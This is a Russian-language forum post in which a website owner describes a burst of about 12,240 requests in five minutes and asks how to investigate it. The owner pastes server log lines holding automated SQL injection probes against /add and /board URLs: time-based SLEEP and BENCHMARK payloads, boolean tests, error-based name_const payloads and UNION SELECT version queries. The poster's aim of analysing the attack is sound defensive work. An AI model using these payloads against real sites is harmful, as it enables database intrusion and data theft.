Ситуация следующего характера...
2 марта в течении примерно 5 минут, на сайт поступило 12 240 запросов.
Сайт и данные (контент) в порядке, пользователи не пострадали
, (вроде как) на первый беглый осмотр… а вот как более детально изучить и проверить эту ситуацию?Слыхал про msql инъекции и прочее… и парсеры.
Подскажите пожалуйста, может быть у кого то была подобная ситуация. Заранее спасибо.
П.С. За 12 часов до этого зарегистрировался новый пользователь, действий не совершал, email подтвердил...
Логи сервера смотрел, портянка там зачетная:)
/add?back=/board'||SLeeP(3)&&'1
/add?back=/board' aND BeNChMaRK(2999999,Md5(NoW())) AnD '1
/add?back=/board'&&sLEEp(3)&&'1
/board/uslugi?page=2 AnD BeNChMaRK(2999999,MD5(NOW()))
/board/add?back=/board' or (1,2)=(select*from(select name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1),name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1))a) — 'x'='x
/board and 1=1
/board and 1>1
/board or (1,2)=(select*from(select name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1),name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1))a) — and 1=1
/board" or (1,2)=(select*from(select name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1),name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1))a) — "x"="x
/board" and "x"="y
/board' and 'x'='x
/board' and 'x'='y
/board' or (1,2)=(select*from(select name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1),name_const(CHAR(76,107,67,86,102,82,80,69,120,99),1))a) — 'x'='x
/board" and "x"="x 1 1 0 % 00:00:00 0 % -
/board99999" union select unhex(hex(version())) — "x"="x
/board99999' union select unhex(hex(version())) — 'x'='x
/board999999.1 union select unhex(hex(version())) — and 1=1
/board2121121121212.1
→ v2.10.1